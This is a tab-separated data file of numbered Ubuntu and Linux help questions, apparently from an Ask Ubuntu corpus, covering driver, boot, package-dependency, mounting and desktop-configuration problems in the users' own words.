284557	how to suppress ipv4 checksum errors on virtual terminal ?	( other terminals like gnome-terminal and sshing have no problem at all . ) every 10 seconds , an error message ( jme 0000:05:00.5 : eth0 : ipv4 checksum error ) constantly appears on the virtual terminal ( which can be accessed by ctrl + alt + f1~6 ) , and it annoys me because that makes using programss like vi or w3m very hard . how to suppress that message on the terminal ?
284565	select on which partition reboot	is there any way to select a partition for the next boot . for example : sudo reboot boot=/dev/sda2 i would like to make a system backup script .
284569	bash syntax for arbitrary file descriptors	in the bash manual , opening an arbitrary file descriptor is described as : /dev/fd/fd if fd is a valid integer , file descriptor fd is duplicated . does this mean /dev/fd/123 , or dev/123/fd , or /dev/123/123 ?
284576	deleting contents of a disc	i need to completely delete the contents of the folder /data obviously i launched rm-rf * but it 's been running from a long time ( i have many large files for a total of nearly 1 tb ) . given that the folder in question is a mount point for an array of disks in a raid5 and , in essence , is a disk ( /dev/md0 ) is there a faster way to delete all the data without destroying the array ? thank you , greetings to all !
284580	getting msi gt70 gt60 onc leds on steelseries keyboard working ?	i have an msi gt70 onc laptop . the laptop comes with steelseries keyboard that has leds in the keys . on windows 7 i can use change the leds to light up any colour . i would like to know how to find out if there is a driver for my keyboard ? if you need more information just tell me the terminal commands .
284584	xorg-edgers ppa does n't seem to include fglrx-installer package	i 'm trying to use the xorg-edgers ppa to install the latest ati drivers on my laptop : https : //launchpad.net/~xorg-edgers/+archive/ppa according to that link there is a package named fglrx-installer for 12.10 ( quantal ) : fglrx-installer 2:12.100~beta7-0ubuntu1~xedgers~quantal1 so i tried to add the ppa and install the package like this : sudo add-apt-repository ppa : xorg-edgers/ppa sudo apt-get update sudo apt-get install fglrx-installer it simply fails and reports that no such package exists . so how do i get this thing installed ? $ sudo apt-get install fglrx-installer reading package lists ... done building dependency tree reading state information ... done e : unable to locate package fglrx-installer $ apt-cache search fglrx-installer $
284586	how can i prevent ubuntu from shutting down immediately when hitting shutdown key ?	i quite often let my computer run , lock the screen and let it download something while i 'm away . when i come back , i often forget that my notebook is still running , so i press the key to turn it on . before , i had ubuntu 10.04 ( gnome ) which asked me if i want to shutdown when i did this while the computer was still running . now , i have linux mint 14 ( mate ) . when i now press the power key while the computer runs , it shuts down . how can i get the same behaviour in mate that i had before in gnome ?
284589	issue mounting nas	i am trying to mount a nas on one of my servers : htadmin @ testing : ~ $ showmount -e 10.0.0.210 export list for 10.0.0.210 : /humanresources /web /usb /recordings /public /network recycle bin 1 /multimedia /download /data now i try to mount it : sudo mount -o soft , intr , user_name=administrator , password=xxxxxxxx \ , rsize=8192 , wsize=8192 10.0.0.210 : /data /mnt/nas and i am presented with the following error message : mount.nfs : an incorrect mount option was specified any help here would be great . thanks !
284593	how do install ubuntu on vmware player and have it visible and usable by all users ?	host os is windows 7 . vmware player 5 will host the virtual machine . ubuntu desktop is the virtual os how can i install and configure vmware player and ubuntu so all users can login and use the ubuntu vm ? thank you !
284594	problems with grub install	a few days ago i did install ubuntu with 3 partitions , swap / and /home , then i disconnected the hard drive and i installed windows 7 on another hard drive . the problem is : i do n't get the grub menu to choose between operating systems . i tried sudo grub-install /dev/sda , but it gives me the following error : /usr/sbin/grub-bios-setup : warning : the file system 'ext2 ' not allow wardrobe . /usr/sbin/grub-bios-setup : warning : can not embed . grub can only be installed in this setup by using blocklists . however , blocklists are unreliable and their use is not recommended .. /usr/sbin/grub-bios-setup : error : will not proceed with blocklists . what do i do ?
284595	how to implement the msg_dontwait on a recv call	i am implementing a server simulation program and want to check if anything was received via a recv from a tcp/ip socket witout waiting . when i place the msg_dontwait flag , recv returns a length of -1 and errno of `` resource temproarily anavialable '' . the call works when the msg_waitall flag is used .
284596	ubuntu 12.04 ( 64 bits ) not recognize 8gb sdhc memory card kodak	i have a 8gb sd hc memory card . kodak . i plugged but it is n't recognize . i tried restarting and the same result . i 'm new in ubuntu . what i should do ? thnks .
284600	can wubi 12.10 installation be overwritten , but retain the wireless configuration ?	first time ubuntu user . i installed wubi 12.10 and managed to configure the wireless ok using great forum posts . then tried to install wine before doing a ubuntu update . got error message of `` missing dependencies '' . did ubuntu update but after that things went downhill . now locks up if i try to run wine . but when i tried to use the ubuntu software center to re-install wine i get message that my `` unlock keyring password '' is n't correct . i never even had a keyring password when i started . what i really want to do now is get back to the default original ubuntu configuration , but keep my wireless intact . ( a ) can i save the wireless setup but load a fresh install of ubuntu 12.10 ? or ( b ) what steps will i need to take to wipe out the existing wubi 12.10 installation on the hard drive , and make sure a new installation wo n't retain some of the corrupted files of the present install ?
284601	how come i can not shut down properly ?	i wonder why i can not turn off correctly . whenever i try to turn off , it get a black screen and it turns back into ubuntu . only ubuntu , hp4140 mini .
284602	what to do when gparted tells me : error : ntfs is inconsistent ?	i bought a seagate expansion 1tb drive few month 's ago . it was working smooth until 3 to 4 days ago , when this problem struck me . i plugged it to my laptop in windows 7 ( i have dual boot , ubuntu 12.10 and win 7 as well ) , the drive got mounted but when i tried to open folders present in it , the window used to show 'not responding ' message ( same as a window hang 's in window 's os ) . then i tried to find the problem using gparted , and gparted showed me an this warning , also this , i also tried to run ntfsfix command , and following was the output , sudo ntfsfix /dev/sdb1 [ sudo ] password for satwik : mounting volume ... ok processing of $ mft and $ mftmirr completed successfully . checking the alternate boot sector ... ok ntfs volume version is 3.1 . ntfs partition /dev/sdb1 was processed successfully . satwik @ satwik-hp-probook-4430s : ~ $ please help me out ! i have already lost my previous 500gb drive .
284608	gmtp counterpart for kindle paperwhite ?	i plan to buy a kindle paperwhite . in all discussions so far about connecting the kindle paperwhite to ubuntu , i have seen only answers/comments that suggest how to connect kindle fire to ubuntu , and i have seen that kindle fire does n't appear that kindle paperwhite uses mtp under firmware versions 5.3.1 or 5.3.3 . so far i do n't have a clear picture about whether data transfer is possible between ubuntu 12.04 and kindle paperwhite . i want to know ( i ) which firmware versions for sure use mtp , so that gmtp does the trick for me , so that i can select the right kindle paperwhite firmware version . ( ii ) if there are none , then does there exist a universal solution for some/all the available firmware versions of kindle available in the market . i want to get this done without rooting .
284609	is that possible to install language pack offlinely ?	i have a laptop , and i want to install indonesian language pack . unfortunately , there is no internet connection . can i install language packs offline ( assuming i can download files in another computer ) ? log : failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/l/language-pack-gnome-id-base/language-pack-gnome-id-base_12.04+20120417_all.deb could not resolve 'archive.ubuntu.com' failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/l/language-pack-id-base/language-pack-id-base_12.04+20120417_all.deb could not resolve 'archive.ubuntu.com' failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/l/language-pack-id/language-pack-id_12.04+20120417_all.deb could not resolve 'archive.ubuntu.com' failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/l/language-pack-gnome-id/language-pack-gnome-id_12.04+20120417_all.deb could not resolve 'archive.ubuntu.com' failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-locale-id_11.0+build1-0ubuntu4_all.deb could not resolve 'archive.ubuntu.com' failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/libr/libreoffice/libreoffice-l10n-id_3.5.2-2ubuntu1_all.deb could not resolve 'archive.ubuntu.com' failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/o/openoffice.org-hyphenation/openoffice.org-hyphenation_0.6_all.deb could not resolve 'archive.ubuntu.com' failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/p/poppler-data/poppler-data_0.4.5-2_all.deb could not resolve 'archive.ubuntu.com' failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/t/thunderbird/thunderbird-locale-id_11.0.1+build1-0ubuntu2_all.deb could not resolve 'archive.ubuntu.com' edit : i 've trying myself to run terminal and use gksudo file-roller to open archive manager with elevated rights , and extract all of contents of package manually , but did n't works .
284617	i have installed ubuntu 12.04.2 64-bit , but it still not opening after installation	i have installed ubuntu 12.04.2 alongside windows 8 ( pre-installed , default in laptop ) . after installing and restarting , only windows 8 opens , i do n't see ubuntu .
284623	create multiple directory and subdirectory from multiple txt files	i have three text files : years.txt containing : 2003 2004 2005 2006 ... type.txt containing : cpu case ram hd ... month.txt containing : jenuary february march ... now , i want to create the year folders , inside each of them , create the type folders and into each type , create the days folders . for example : 2003 cpu jenuary february ... case jenuary february ... etc . i must use bin bash script . i think i must read each file , line by line , and store each line into an array ... someone can help me ? thanks a lot
284626	stuck at purple screen for some kernels , but not for all	after updating the kernel the usual boot gets stuck with a purple screen . if i choose to start from the kernel 3.5.0-17 everything still works fine , but it is not possible to start from newer kernel versions . what is really strange is that none of the kernels work in recovery mode ( not even kernel 3.5.0-17 ) . all of them get stuck at some point . i use ubuntu 12.10 on an aver travelmate with intel cor i5 and intel hd and nvidia gt540m graphic cards . google mainly led me to pages where they pinpointed the solution to graphic problems , but this does n't seem to be the case here , since not even recovery mode is working . i would be very happy for some ideas .
284635	inxi installation on ubuntu	i have migrated from linux mint to ubuntu 64 ( kde installed ) . i want check my hardware with inxi -f command but it returns : inxi : command not found and as i want to install inxi ( sudo apt-get install inxi ) it resturns e : unable to locate package inxi how can i install it in ubuntu ?
284640	unable to execute shell scripts from `~/bin`	i am learning to write shell script from this tutorial on linuxcommand.org . it says - most modern linux distributions encourage a practice in which each user has a specific directory for the programs he/she personally uses . this directory is called bin and is a subdirectory of your home directory . i 've tried this . but i get the following error- foobar : command not found later in that page , it also says that- on some distributions , most notably ubuntu , you will need to open a new terminal session before your newly created bin directory will be recognised . it means that ubuntu does support this feature . but why is n't it working ? i am on ubuntu 12.04 lts .
284643	how to make a wine shortcut for an .application file	i have a windows app that uses the .application extension . i can open it in thunar by double clicking it , or r-click and open with rundll32 . i want to create a .desktop shortcut to open this so i can use it in my menus and thunar custom actions . according to the wine wiki , rundll32 needs to be used as , wine rundll32 < dll_file > , < function > [ function arguments ] but is the < dllfile > supposed to mean the .application file ? also , i 'm not sure what function or arguments to use . this is a snippet from an .exe shortcut that works : exec=env wineprefix= '' /home/akovia/.wine-dotnet40 '' wine c : \\\\program\\ files\\\\windows\\ program.exe thanks for any help that can be offered . i 've done some more poking around but still no joy . the .application file put a shortcut on my desktop .appref-ms that works if i double-click it , but creating a launcher to execute it fails . is there some way to see what command thunar is using to launch either of these files and how to recreate it in a .desktop file ?
284652	how to activate my touchpad features on samsung series 7 chronos	i 'm just looking to how enable the features of my touchpad on my laptop running ubuntu 12.10 . the mouse is working but none of the features are working ( like two fingers scrolling up/down ) . i visited some tutorials like https : //help.ubuntu.com/community/samsungseries9 it works until i set the psmouse protocol . the section on system setting > mouse and touchepad > 'touchpad ' dissapeared ; i dont really understand why . can you help me please ?
284656	how can i access my ubuntu boot disk files as external usb disk on centos 6.3 ?	not sure whether this would be more appropriate in a centos forum , but i 'll post it here for starters as i am more comfortable and familiar with ubuntu . i recently purchased a server with centos 6.3 already on it . i want to copy some files from my ubuntu server 12.04 drive as an external usb drive . it immediately comes up as a drive in centos , but it only shows a grub folder , a lost+found folder , and a few other files . i had lvm set up on it , but i do n't see any of that . any suggestions ? i 'd like to avoid copying over the network . thanks !
284659	why am i unable start the deluge daemon from connection manager ?	i am using deluge 1.3.5 on ubuntu 12.04 . i launch deluge and open the connection manager , and after clicking the start daemon button i get the following message in a error message box : unable to start daemon ! deluge can not find the 'deluged ' executable , it is likely that you forgot to install the deluged package or it 's not in your path . how can i fix this error ?
284660	computer has locked up , will it recover ?	i have set some programs to run on my desktop ( intensive ) and i think they are using all available ram , to the point that now the machine is completely locked up the clock is n't even updating ( it 's been 30 mins now ) . my programs take ~10 hours to run ( intense simulations ) , my question is , if all the ram is being used up i suspect the programs are having to context switch alot and save to disk to share the ram , if i just leave the system will it recover ? i.e . are the programs still running or is it a complete gonner and i 'm just going to have to hard restart ? i 've tried ctrl+alt+f1 and ctrl+alt+t to try and get a terminal up but have had no luck i 've been moving the mouse , i see a few jitters , what worries me is the time has just not updated : s
284662	12.10 ; nvidia 285 ; gnome 3 ; renderer shows gallium	i know there have been a number of posts/articles about getting nvidia to work under ubuntu . yet after extensive searching i have n't found one that has gotten me where i need to be . here is my situation : ubuntu 12.10 installed on intel i7 ( non-sandybridge ) with nvidia 285gtx video card . after initial ubuntu installation i installed linux headers , turned off x/nouveau and ran the nvidia shell script to install the 310 version drivers . next i installed gnome 3 and switched to it as desktop . reboot . result : sluggish desktop performance . details in system settings shows graphics driver gallium 0.4 on llvmpipe ( llvm 3.2 , 128 bits ) . from shell glxinfo shows same as above for renderer . $ desktop_session shows ubuntu . lspci vga section shows : 02:00.0 vga compatible controller : nvidia corporation gt200b [ geforce gtx 285 ] ( rev a1 ) tried restarting gdm with no result . any ideas how to get the renderer to use the nvidia hardware rather than gallium software ?
284668	what 's the history about the shift + arrow keys in terminal ?	i 'm wondering why shift + arrow key result in one of the a , b , c or d letters . why not other letters ? why any letter at all ?
284671	how do i get the touchpad working on an acer aspire 5332	i recently installed ubuntu desktop 12.10 on my acer aspire 5332 . i now have an issue with my touchpad not working . when i type the command x input list in the terminal here is what comes up : ~ $ xinput list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ synps/2 synaptics touchpad id=13 [ slave pointer ( 2 ) ] ⎜ ↳ microsoft microsoft basic optical mouse id=14 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ sleep button id=9 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=12 [ slave keyboard ( 3 ) ] ↳ novatek kensington u+p keyboard id=10 [ slave keyboard ( 3 ) ] ↳ novatek kensington u+p keyboard id=11 [ slave keyboard ( 3 ) ] i 'm not sure what i can do to fix it . if you need any more information , i will be happy to provide .
284673	kde profiles for home , work movie watching etc	is there a way to configure different kde config modes for different profiles ? when i am watching a movie i do n't want to see a screen saver or lock screen , but when working at my pc i want to start a screen saver after 15 minutes . also display dimming and similar settings are different . i do n't want to create several users .
284674	how install unity 5.20.0 ?	recently was release unity 5.20.0. https : //launchpad.net/unity i am using 12.04.2 lts with unity 5.18 , and i want to install new version of unity . how can i do it ? what are the steps for compile and install unity 5.20 on ubuntu 12.04 lts ? there is not exist a .deb package , yet . i ca n't find the new repository step by step in terminal ? thank you.. !
284679	why does n't mysql create the pid ?	mysql starts fine , everything is working as expected , but there is no pid file where my.cnf says it should be , the .sock is there this is the relevant section of my.cnf [ mysqld ] user = mysql pid-file = /var/run/mysqld/mysqld.pid socket = /var/run/mysqld/mysqld.sock but /var/run/mysqld # ls mysqld.sock ps aux ... ps aux | grep mysql mysql 23990 0.1 4.4 887340 75904 ? ssl 17:25 0:01 /usr/sbin/mysqld again , everything works , but i need the pid so that god can monitor it
284680	issues creating bootable usb	i 'm trying to get ubuntu 12.10 desktop onto a flash drive ( formatted to fat ) , to repair a windows laptop i have . per the ubuntu site : i 've installed the pendrive universal usb installer . i had it download the iso file ubuntu-12.10-desktop-i386.iso . but when it completes and i try to boot it up on the laptop , i 'm getting the error : no default or ui configuration directive found ! i 've read the info about renaming the isolinux files to syslinux but , that has not been helpful . the syslinux folder already exists . however , it appears that it 's not being extracted correctly . all the file names ( within the syslinux folder ) seem to be random bits of words . see below : if i use 7-zip to manually extract the iso file , the isolinux folder is there but , not the syslinux folder . the correct files appear to be in this folder . i tried creating the flash drive with unetbootin , using the same iso file and when i went to boot the laptop , all i got was a generic `` boot error '' . what am i missing here ? this is my first go-around with ubuntu so , any assistance is appreciated .
284683	how to run bittorrent sync ?	i am in ubuntu 12.04 ( precise ) 64bit and downloaded the btsync executable from http : //labs.bittorrent.com/experiments/sync/ but running it does n't seem to have any effect . double-clicking the executable does nothing , and running ./btsync in the terminal also exits immediately without any output . has anyone successfully ran this under ubuntu , and if so , is there any special configuration changes that need to be made to make it work ?
284691	why does xfce ignore my preferences ?	after re-configuring the screen setup ( nvidia x settings ) , my xfce starts in the default styling and shortcuts such as alt+f2 are not working anymore . whenever i check the shortcuts under settings keyboard - > shortcuts they are correct . when i change to another theme under apperance , nothing changes . what can be the be the reason for this ? how can i track down the problem further ? i would be happy for any small hint .
284693	disabling java auto update notification in ubuntu ?	i am looking for a way in ubuntu to disable the java/jre update notification so users do not get asked to allow or delay a jre update . i would like to have it not check at all so it is not possible for users who do not know how to install it to even have the choice . i would rather do a manual schedule as needed . i am running oracle jre 1.7.0_xx with firefox . the update notification is the pop up box that comes up when you start a java applet and it checks to see if you are running the most current version or not . what i would like to disable if possible is the auto check that is run when the applet is started so the update box does not appear .
284694	ubuntu 12.10 keyboard & touchpad not working on acer aspire v3-551-7844	i 'm a bit new to the linux world , and my english is bad , so go easy on me ok ? ; ) i have just installed ubuntu 12.10 in my acer aspire v3-551-7844 ( wich came with windows8 , but after some effort i got rid of that crap ) , and got this odd issue : using the cd , or during installation , or at grub screen , or in windows7 , everything is fine , but when i boot into hd 's ubuntu , the notebook 's keyboard and touchpad are completely dead ... external usb keyboard and mouse works fine . i have tried many answers about similar issues here and over the web , and updated everything ubuntu suggested , but nothing works ... already tried all keboard model configurations at system settings > hardware > input devices > keyboard , with no effect . also , in touchpad is said : `` no touchpad found '' ... any ideas ? i really need ubuntu working . thanks in advace !
284705	non-vector icons in nautilus	i 'm happy acer aod257 ( 2gb , atom ) netbook owner with ubuntu 12.10 . i once saw that all nautilus/unity/ubuntu icons are in raster and vector formats . but ! i see vector only . my netbook is weak , does anybody have any solutions ? question : how to enable bitmap icons by default ?
284706	unable to connect through java programs in ubuntu	i am unable to connect to any host through java programs , getting java.net.connectexception : connection refused . does it have anything to do with ubuntu firewall configurations or any other setting ? i am running ubuntu 12.04 lts
284707	in a “save as … ” dialog , what 's the quickest way to keyboard-navigate to “tmp” and to indiv . bookmarks in the “places” side-pane of nautilus ?	building on my earlier question , where the accepted answer used keyboard accelerators for some elements of the dialog , i 'm still trying to find the accelerator ( and/or quickest way ) to select ( focus ) the tmp folder and my bookmarks in the “places” side-pane of nautilus ' “save as … ” dialog , without having to traverse and mount other filesystems , which are in between recently used , home , desktop -- - and -- - tmp , bookmarks . any idea how ?
284709	how to show subtitles under the video ?	using vlc 1.1.12 on ubuntu 11.10 , i 'd like to show subtitles under the video so that they do n't disturb me . i tried to change it : interface > preferences > subtitles & osd > force subtitle position > -110 px ( i also tried with other values ) but nothing changed ( well , if i set +100px the subtitles are shown in a higher position ) . what am i doing wrong ?
284722	how do i remove this annoyingly pixelated popup ?	how do i remove this annoyingly pixelated popup ? it looks like the gnome3 popup for volume , however it only pops up when i use my laptops multimedia keys , not the volume or brightness keys . i ca n't figure out if it 's a certain package ( which would be difficult considering unity also runs on gnome elements ) anyone got an idea ? here is an image
284725	install skype on ubuntu 12.04 lts 64-bit	since weeks ago i 'm trying to install skype on my computer . i imagined it would be a straight forward task but it is becoming a nightmare . what i have tried so far : installing from command line with apt the easiest one and the most likely anybody would try : sudo apt-get install skype but i get this unfortunately : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : skype : depends : skype-bin e : unable to correct problems , you have held broken packages . if i try sudo apt-get intall skype-bin i get : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : skype-bin : i386 : depends : libqt4-dbus : i386 ( > = 4:4.5.3 ) but it is not going to be installed depends : libqt4-network : i386 ( > = 4:4.8.0 ) but it is not going to be installed depends : libqt4-xml : i386 ( > = 4:4.5.3 ) but it is not going to be installed depends : libqtcore4 : i386 ( > = 4:4.7.0~beta1 ) but it is not going to be installed depends : libqtgui4 : i386 ( > = 4:4.8.0 ) but it is not going to be installed depends : libqtwebkit4 : i386 ( > = 2.2~2011week36 ) but it is not going to be installed recommends : sni-qt : i386 but it is not going to be installed e : unable to correct problems , you have held broken packages . after that i tried with commands like sudo apt-get clean , sudo apt-get update , sudo apt-get autoclean and sudo apt-get -f install , among others , in order to fix any issue with packages dependency but it was completely unsuccessful . i have followed the instructions explained here ( how do i install skype ? ) but it does n't work either . installing from software center if i try to install from software center i get exactly the same error than running sudo apt-get install skype from the terminal . installing with ubuntu tweak fails as well , i get the following error : skype : depends : skype-bin , but it is a virtual package . installing with synaptic i have also followed the instruction described here : community.skype.com/t5 / linux / unable-to-install-due-to-unmet-dependencies-skype-bin/m-p/1339650/highlight/true # m3329 much of the same , does n't work either . installing official skype .deb after downloading skype-ubuntu-precise_4.1.0.20-1_i386.deb from http : //www.skype.com/en/download-skype/skype-for-linux/downloading/ ? type=ubuntu64 i tried to install it though software center but it displays the following error : can not install 'lbqt4-dbus : i386' trying to fix apt i have tried to fix any possible problem with packages by following this post ( how do i resolve unmet dependencies ? ) but did n't work . following ubuntu help instructions if i try to follow the instructions explained in https : //help.ubuntu.com/community/skype i have problems when running sudo dpkg -- add-architecture i386 , i get the following : dpkg : error : unknown option -- add-architecture i have also tried other approaches by following other posts and solutions i found but nothing of this worked for me . at this point i 'm completely lost and i do n't know what else i can do . i hope somebody can comes up with any solution . this is the content of my sources.list , just in case : # deb cdrom : [ ubuntu 12.04.2 lts _precise pangolin_ - release amd64 ( 20130213 ) ] / dists/precise/main/binary-i386/ # deb cdrom : [ ubuntu 12.04.2 lts _precise pangolin_ - release amd64 ( 20130213 ) ] / dists/precise/restricted/binary-i386/ # deb cdrom : [ ubuntu 12.04.2 lts _precise pangolin_ - release amd64 ( 20130213 ) ] / precise main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //archive.ubuntu.com/ubuntu precise main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //archive.ubuntu.com/ubuntu precise-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu precise universe deb http : //archive.ubuntu.com/ubuntu precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //archive.ubuntu.com/ubuntu precise multiverse deb http : //archive.ubuntu.com/ubuntu precise-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //archive.ubuntu.com/ubuntu precise-security main restricted deb http : //archive.ubuntu.com/ubuntu precise-security universe deb http : //archive.ubuntu.com/ubuntu precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu precise partner deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . # deb http : //extras.ubuntu.com/ubuntu precise main # deb-src http : //extras.ubuntu.com/ubuntu precise main deb http : //archive.canonical.com/ precise partner deb-src http : //archive.canonical.com/ precise partner
284732	rhythmbox keeps repeating same song after play queue is empty	i 'm not sure if this is a bug , but whenever rhythmbox is finished playing all the songs in my play queue it immediately jumps to first song in my music library and keeps playing it over and over . i do n't have shuffle or repeat enabled . its just plain weird . any idea how to make it stop ? i 'm using ubuntu 12.10
284735	installing ubuntu , on a windows 8 laptop , without a cd . can it be done ? and what is the normal time for download ?	i have a aspire laptop , windows 8 pre-installed with 8 gb of ram . i have tried to download via thumb drive but it wo n't download . so i wanted to know there were any other ways to download it without a cd . is it normal for a download to be longer than 4 hours ? ( that 's with bios )
284736	ubuntu server installation	the server i just built does not have a cd drive . i want to install ubuntu server 12.10 the mother board in the server is a gigabyte ga-h61m-usb3 . i burned the image to a thumb drive and set up the bios to boot from usb ( usb-cdrom setting ) . the installer launches and i am able to do the initial setup ( language , keyboard , etc . ) but then get a error that it ca n't find the cd drive . can anyone help ? ?
284740	color calibration and 3d acceleration	i am a photographer and i am looking at moving to ubuntu in the near future . i also enjoy playing games . i am planning on building a new computer specifically for ubuntu . i 've been doing some testing with a laptop that has an nvidia graphics chip in it and i 've discovered that i can use the gnome color calibration tool to calibrate my display using my colormunki . however , if i install the nvidia driver so i can play a video game , i am unable to calibrate my display . my question is , does either the amd driver or intel driver have this same issue ?
284742	image can not be seen in htdocs ?	i am using ubuntu 12.10 and recently have installed xampp 1.8.1 . my problem is : image from server can not be shown . my code is : : < div class= '' sideblock unsung '' > < h4 > unsung heroes ... < /h4 > < a href= '' # '' > < img src= '' _images/1_full.jpg '' alt= '' midnight run '' width= '' 99 '' height= '' 135 '' / > < /a > < a href= '' # '' > < img src= '' _images/2d7y3ki.jpg '' alt= '' wyatt earp '' width= '' 99 '' height= '' 135 '' / > < /a > < /div > here , in my address bar i use http : //localhost/madetemplet/basictemplet/templet03.html and i want to show image after `` unsung heroes '' text but it only shown some link and not any image but when i use the following file : ///opt/lampp/htdocs/madetemplet/basictemplet/templet03.html and images are shown after unsung heroes text . it works well in windows platform . after checking the permissions to access the directory where images are , i get this text in my terminal window : : sabbir @ sabbir-pc : /opt/lampp/htdocs/madetemplet/basictemplet/_images $ ls -l total 300 -rw -- -- -- - 1 sabbir sabbir 204067 feb 24 2010 1_full.jpg -rw -- -- -- - 1 sabbir sabbir 75789 nov 13 2009 2d7y3ki.jpg -rw -- -- -- - 1 sabbir sabbir 23692 apr 21 2010 6ab32ae44600435b9de0fb5eba24a912.gif as a new user i ca n't insert image so you can check the given link as follow : http : //stackoverflow.com/questions/16178342/image-can-not-be-seen-in-htdocs-in-ubuntu-12-10
284746	how to install ati radeon hd 4670 on ubuntu 12.10	this is the first time i 'm using ubuntu . my knowledge about linux is almost nothing . i installed ubuntu 12.10 from windows 7 ( dual boot ) but i think it did n't install my graphics ( ati radeon hd 4670 ) driver because in the system settings > details , it says graphics unknown . so i install the amd catalyst legacy ( fglrx-legacy ) but it does n't work . i had a problem with the resolution . then i remove it and back to normal . i also tried xorg-edgers . this time i 'm stuck at the purple screen after reboot . then i recover using the grub menu , remove xorg-edgers , and it back to normal again . is there any way to install it ?
284750	unity wo n't start	i know there 's fixes but none of them are working . for some reason when i restarted my pc out of a lag my side bar never came up . i looked and looked and looked and researched and it 's unity . so after most of the day noticed the unity service is n't on at all . i tried installing that and still has problems . when i type in unity to try to reset it , it gives me this error : xlib : extension `` glx '' missing on display `` : o.o '' . compiz ( opengl ) - fatal : glxquery extensionsstring is null for screen 0 it looks like when i type in unity it says opengl is n't on . how do i set it to be on ? i do n't know why it 's giving me this error . i only started using linux today and it 's giving me this much trouble i almost want to go back to windows . guys , help !
284752	make sure server can always boot and a hard drive is mounted before sharing with samba	i have two 2-tb hard drives ( not the boot/system drives ) with a single partition in each , that i share with samba . mountpoints are in /mnt/drive01 and /mnt/drive02 . these are also the path of two samba shares , named backup1 and backup2 . as soon as these shares are up , they start getting filled with ( lots of ) data from other machines in the network ( some machines write to backup1 , others to backup2 , but none writes on both ) . everything works as planned , no problem with samba . this server ( on remote location ) is configured to auto-reboot in case of power loss etc . also , i have two drives in raid1 as system/boot drives , to make sure the server can ( almost ! ) always at least boot . the problem is in case the system boots fine , but for some reason can not mount one ( or both ) of the 2 tb hard drives : samba would start sharing /mnt/drive01 and /mnt/drive02 , the large capacity drive ( s ) is not mounted so all the data in fact ends up on the system drive , filling it up and making the system unusable or unable to be accessed remotely via ssh . so i do n't think is a good idea entering the partitions of the two 2 tb drives in /etc/fstab , since i noticed some problems in boot in case one of the data drives is for example disconnected . again this is important as the server is in remote location and can not rely on an operator intervention to fix on-screen messages such as `` drive not ready , keep waiting , press s to skip mounting , m for manual ... '' so i have a small script which tries mounting the data drives a minute after boot , and this fixes the fstab part . now on to samba . what i would like is to have samba start after some time ( no problem ) but also `` dynamically '' enable or disable the two shares . so , for example , if the 2nd data drive fails , my script will only be able to mount the 1st data disk and samba would only advertise the backup1 share ( with data being written to the 2-tb disk drive ) ; the other share ( backup2 , mapped to /mnt/drive02 ) would be not advertised/disabled , but at least i have one share running ( and some of my machines can pour data into it ) . of course , the easy way is to have samba start only if both data drives are mounted , but this is an all-or-nothing solution any ideas ?
284753	using 13.04 i get `` duplicate sources.list entry '' warnings from i386 and amd64 packages	i understand this was a bug in oneric , but was fixed , so why is raring trying to fetch both achetypes when i use apt in the terminal , and how do i fix it ? i tried running yppa and it says i have no duplicates . initially , there were duplicates , which were removed by this handy little .php-based tool : results : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- sources.list checker 0.01-beta done by mubarak alrashidi ( deadsoul ) -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- total lines : 164 total repositories : 32 active repositories : 32 inactive repositories : 0 duplicated repositories : 5 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- line : repositories : 83 deb http : //archive.ubuntu.com/ubuntu raring universe 117 deb http : //archive.canonical.com/ubuntu raring partner 118 deb-src http : //archive.canonical.com/ubuntu raring partner 155 deb http : //archive.canonical.com/ubuntu raring partner 156 deb-src http : //archive.canonical.com/ubuntu raring partner -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- to un-do this , check the backup : '' /etc/apt/sources.list.bkp.2013-04-23_16-40-38 '' so then i ran apt-get update again , but i 'm still getting `` duplicate '' warnings , and these warnings relate to package requests for both i386 and amd64 . terminal output : w : duplicate sources.list entry http : 